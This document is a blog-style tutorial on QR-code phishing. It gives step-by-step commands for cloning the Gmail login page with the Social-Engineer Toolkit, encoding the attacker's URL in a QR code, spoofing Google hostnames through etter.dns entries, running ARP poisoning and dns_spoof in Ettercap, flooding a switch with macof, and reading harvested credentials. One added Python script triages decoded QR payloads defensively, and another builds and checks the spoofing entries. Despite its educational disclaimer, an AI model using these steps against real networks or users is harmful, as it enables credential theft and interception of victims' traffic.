QR Code Attack Vector :: Spoofing, Poisoning and Phishing applications with QR Codes

A QR code is a two-dimensional barcode that a dedicated reader (and, today, the camera on any phone or tablet) decodes to reveal its content, most often a URL that the reader then opens. Originally created for tracking parts and managing inventory, it now appears on posters, business cards, banners, manuals, flyers and so on. That popularity is exactly what makes it useful to attackers and trolls: the person scanning cannot read the payload before the scan, and the reader on their personal device will often follow the embedded link straight away. In this post I walk through this attack vector and the ways it can be exploited, either by plain phishing (the scan sends the victim to a server we control) or by combining the QR code with DNS spoofing and ARP poisoning using other tools.

We will perform the attack with setoolkit (the Social-Engineer Toolkit, SET), a very powerful social engineering framework that we will use to clone a website; the URL of the cloned site is what we then embed in an NFC tag and in a QR code.

First, open setoolkit and make a simple clone of the Gmail login page, served from our own machine:

 # setoolkit   

Select, in order:

 1) Social-Engineering Attacks  
 2) Website Attack Vectors  
 3) Credential Harvester Attack Method  
 2) Site Cloner  

Enter the IP of the attacking machine, e.g. 192.168.1.56
Enter the URL to be cloned, e.g. https://accounts.google.com

If you followed the setup from the earlier post, the cloned page is now written to /var/www/html/ and served by Apache.

Check it by opening it in a browser on the attacking machine:

 http://localhost  

Creating the QR Code
Now we put the URL of our server inside a QR code.
There are several ways to generate one, including online generators (avoid those on a real engagement: you would be handing the phishing URL to a third party) and the QRCode Generator Attack Vector built into setoolkit. For this post I chose the simpler alternative, qrencode:

 # apt-get install qrencode  
 # qrencode 'http://192.168.1.56' -o qr_attack.png  

If you have no way onto the target's network and do not want a raw IP address in the QR code to give the attack away, point a link shortener such as bit.ly at the fake web server and encode the short link instead. If you are on the same network as the victim, the technique can be refined further with Ettercap's ARP poisoning and dns_spoof plugin: by poisoning the ARP caches of the router and the victim and answering the victim's DNS queries ourselves, the traffic for the real hostname lands on our server, so the victim appears to be talking to the genuine site.
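From the defender's side, the tricks above (a raw IP as the host, a shortener hiding the destination, plain http) are all visible in the decoded payload before anyone taps the link. The following is an added example, not code from the original post: it assumes the QR image has already been decoded to a string (for instance with zbarimg) and triages that string. The SHORTENERS set and the sample payloads are constructed for the example, not an exhaustive list.

```python
"""Triage of a decoded QR payload before a phone follows it.

Added example, not part of the original post. It assumes the QR image has
already been decoded to a string (e.g. with zbarimg) and flags the tricks
used in the post: a raw IP as host, a URL shortener hiding the destination,
plain http, and a brand name smuggled into the userinfo part of the URL.
SHORTENERS is a small constructed sample, not a full list.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed sample of shortener hosts; extend for real use.
SHORTENERS = {"bit.ly", "goo.gl", "tinyurl.com", "t.co", "ow.ly"}

# Non-web QR payload types a phone may act on without ever showing a URL.
NON_WEB_PREFIXES = ("mailto:", "tel:", "sms:", "wifi:", "geo:")


def triage_qr_payload(payload: str) -> list:
    """Return a list of (code, detail) findings for a decoded QR payload.
    An empty list means nothing was flagged, which is not the same as safe."""
    text = payload.strip()
    findings = []

    if text.lower().startswith(NON_WEB_PREFIXES):
        return [("non_web", text.split(":", 1)[0].lower())]

    parts = urlsplit(text)
    if parts.scheme not in ("http", "https"):
        if "://" in text:
            return [("non_web", parts.scheme)]
        # qrencode payloads such as '192.168.1.56/login' carry no scheme;
        # most phone readers still open them as http URLs.
        findings.append(("no_scheme", text))
        parts = urlsplit("http://" + text)

    host = (parts.hostname or "").lower()
    if parts.scheme == "http":
        findings.append(("plain_http", host))
    try:
        ipaddress.ip_address(host)
        findings.append(("raw_ip", host))
    except ValueError:
        pass  # a normal hostname, not an IP literal
    if host in SHORTENERS:
        findings.append(("shortener", host))
    if parts.username is not None:
        # 'https://accounts.google.com@192.168.1.56/' shows the brand on the
        # left of the '@' but connects to the host on the right of it.
        findings.append(("userinfo", parts.username))
    return findings


if __name__ == "__main__":
    # Constructed payloads: the post's raw-IP QR, a shortener, a userinfo trick.
    for sample in ("http://192.168.1.56", "https://bit.ly/2xyz",
                   "https://accounts.google.com@192.168.1.56/",
                   "https://accounts.google.com/ServiceLogin"):
        print(sample, "->", triage_qr_payload(sample))
```

Feed it the output of a decoder rather than trusting the phone's preview: the preview typically shows only the host, and for the userinfo case that is exactly the part an attacker chooses.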

Spoofing DNS for the target page
It is also possible to combine the cloned site with DNS and ARP spoofing, using a man-in-the-middle setup with Ettercap to fool the gateway and the victim into thinking we are the requested server, so the real site's hostname shows in the address bar during the attack. One caveat: this only looks convincing for a site served over plain HTTP. For https://accounts.google.com the browser will demand a certificate valid for that name, which we do not have, and Google's login domain is HSTS-preloaded, so the browser will not fall back to http:// either; the victim then sees a certificate error instead of the cloned page.

That process was covered in more detail in an earlier post; here I only give the basic steps. If you want to go deeper into this feature, feel free to do so. 🙂

Edit the Ettercap DNS configuration file and add the following lines at the end, changing only the IP. Each line has the form "hostname A ip", and the hostname must be a bare DNS name (a '*' wildcard is allowed): entries written as URLs, with a scheme or a trailing slash such as https://accounts.google.com/, are loaded by ettercap but never match a query.

 # vim /etc/ettercap/etter.dns  
 #GMAIL SPOOFING  
 gmail.com A 192.168.1.56  
 *.gmail.com A 192.168.1.56  
 accounts.google.com A 192.168.1.56  
 mail.google.com A 192.168.1.56  
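A quick way to catch a bad etter.dns entry before starting the attack is to ask which query names the file would actually answer. The block below is an added example, not code from the original post or from ettercap: it renders the "hostname A ip" lines used above, parses them back, and resolves sample query names against them. Wildcard matching is approximated with fnmatch, which is an assumption; ettercap itself only documents the '*' wildcard.

```python
"""Build and sanity-check etter.dns entries for ettercap's dns_spoof plugin.

Added example, not part of the original post or of ettercap. It encodes the
etter.dns line format used in the post ("<name> A <ip>", '*' wildcard
allowed) and answers "which query names would this file spoof?" so that
entries that can never match are caught before the attack starts.
Wildcard matching is approximated with fnmatch (assumption).
"""
import fnmatch
import ipaddress


def valid_hostname(name: str) -> bool:
    """True for a bare (optionally wildcarded) hostname. A DNS query name
    never contains a scheme or a path, so 'https://accounts.google.com/'
    is loaded by ettercap but can never match anything."""
    n = name.strip().lower().rstrip(".")
    if not n or "://" in n or "/" in n or " " in n:
        return False
    return all(label for label in n.split("."))


def etter_dns_entry(name: str, ip: str) -> str:
    """Return one 'name A ip' line or raise ValueError."""
    ipaddress.IPv4Address(ip)  # A records carry IPv4; raises on bad input
    if not valid_hostname(name):
        raise ValueError(f"not a bare hostname: {name!r}")
    return f"{name.strip().lower().rstrip('.')} A {ip}"


def build_etter_dns(names, ip: str, comment: str = "GMAIL SPOOFING") -> str:
    """Render the block the post appends to /etc/ettercap/etter.dns."""
    lines = [f"#{comment}"] + [etter_dns_entry(n, ip) for n in names]
    return "\n".join(lines) + "\n"


def parse_etter_dns(text: str) -> list:
    """Return (pattern, type, ip) tuples; comments and blank lines skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) >= 3:
            entries.append((fields[0].lower(), fields[1].upper(), fields[2]))
    return entries


def spoofed_answer(entries, qname: str, rtype: str = "A"):
    """IP the first matching entry would answer for qname, else None."""
    q = qname.strip().lower().rstrip(".")
    for pattern, rt, ip in entries:
        if rt == rtype and fnmatch.fnmatchcase(q, pattern):
            return ip
    return None


if __name__ == "__main__":
    # Constructed sample: the corrected entries from the post.
    text = build_etter_dns(
        ["gmail.com", "*.gmail.com", "accounts.google.com", "mail.google.com"],
        "192.168.1.56")
    print(text)
    entries = parse_etter_dns(text)
    for q in ("accounts.google.com", "imap.gmail.com", "www.google.com"):
        print(q, "->", spoofed_answer(entries, q))
```

Running the same check over a URL-style line such as "https://accounts.google.com/ A 192.168.1.56" returns None for accounts.google.com, which is the silent failure the corrected configuration above avoids.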

Configuring Ettercap
Now open Ettercap and set it up to continue the attack:

On the Sniff menu select "Unified sniffing" and pick the interface.
On the Hosts menu select "Scan for hosts" (or press Ctrl+S) to discover the hosts on your network.
Again on the Hosts menu, open the "Hosts list".

Select the IP of the gateway and click "Add to Target 1", then select the IP of the victim you want to sniff and click "Add to Target 2".

Notice:
ARP poisoning already works on a switched network, since it redirects traffic at the hosts rather than at the switch. If you still want to flood the switch's MAC table (this is extremely noisy and easily detected), open a terminal and, as root, type:

 # macof  
Then open "Plugins", "Manage the plugins", and double-click "dns_spoof" to activate it.
After that, go to the Mitm menu, select "ARP poisoning", tick the "Sniff remote connections" checkbox and click OK. Finally, go to the Start menu and select "Start sniffing".

Testing the method:

SET writes the fields of every form submission it receives to harvester log files in the Apache web root. They are named by date and time, so you can follow your tests as they progress:

 # cat /var/www/html/harvester_2016-01-07\ 23\:46\:29.762995.txt   

This article is written for educational purposes, for Information Security professionals and students. We are not responsible for misuse of the techniques described here.

Upcoming posts will cover the same attack delivered through NFC tags and Google Beacons, as more recent carriers for this vector. 🙂
